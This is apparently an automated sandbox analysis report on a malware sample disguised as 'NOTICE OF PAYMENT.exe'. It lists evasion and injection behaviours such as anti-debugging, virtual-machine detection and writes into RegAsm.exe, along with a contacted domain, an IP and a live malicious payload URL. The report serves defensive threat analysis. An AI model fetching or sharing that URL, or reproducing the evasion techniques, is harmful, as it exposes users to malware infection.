behaviorgraph top1 signatures2 2 Behavior Graph ID: 483899 Sample: NOTICE OF PAYMENT.exe Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 18 Multi AV Scanner detection for domain / URL 2->18 20 Potential malicious icon found 2->20 22 Found malware configuration 2->22 24 9 other signatures 2->24 7 NOTICE OF PAYMENT.exe 2->7         started        process3 signatures4 26 Writes to foreign memory regions 7->26 28 Tries to detect Any.run 7->28 30 Hides threads from debuggers 7->30 10 RegAsm.exe 9 7->10         started        process5 dnsIp6 16 qrextechnologies.com 109.71.254.175, 443, 49831 LINSERVERSNL Germany 10->16 32 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 10->32 34 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 10->34 36 Tries to detect Any.run 10->36 38 Hides threads from debuggers 10->38 14 conhost.exe 10->14         started        signatures7 process8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
109.71.254.175
 qrextechnologies.com Germany
207778 LINSERVERSNL true

Contacted Domains

Name IP Active
qrextechnologies.com 109.71.254.175 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://qrextechnologies.com/barrr09_rjFnAm147.bin true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown